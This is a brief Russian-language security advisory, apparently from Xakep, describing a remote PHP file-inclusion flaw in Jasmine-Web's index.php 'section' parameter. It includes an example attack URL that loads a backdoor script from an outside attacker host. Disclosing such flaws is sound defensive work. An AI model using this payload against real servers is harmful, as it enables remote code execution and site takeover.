PHP-инклюдинг в Jasmine-Web

Рекомендуем почитать:

Xakep #295. Приемы рыбалки

Содержание выпуска
Подписка на «Хакер»-60%

Программа: Jasmine-Web

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "section" сценарием index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://victim.pl/index.php?section=ftp://hack.com/backdrphpext

PHP-инклюдинг в Jasmine-Web

Xakep #295. Приемы рыбалки

Подпишись на наc в Telegram!

Из рубрики «Взлом»

HTB Authority. Повышаем привилегии в Windows через ESC1 и Pass the Cert

Магия SSPI. Достаем учетные данные Windows, не трогая LSASS

Приключения «Электрона». Отлаживаем JSC-код любой версии Electron без декомпилятора

HTB Cybermonday. Эксплуатируем путаницу ключей JWT

Трюки

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Инструменты разведчика. Извлекаем данные из Instagram, Telegram, GitHub и других источников

Письмо с сюрпризом. Изучаем уловки и хитрости для доставки писем с малварью

Последние новости

Google исправила проблему пропадающих из Google Drive данных. Пользователи не согласны

AutoSpill похищает учетные данные из менеджеров паролей для Android

Krasue RAT атакует серверы Linux и использует руткиты

Уязвимости 5Ghoul угрожают 5G-устройствам с модемами Qualcomm и MediaTek

Amazon подала в суд на мошенников, укравших миллионы долларов через незаконные возвраты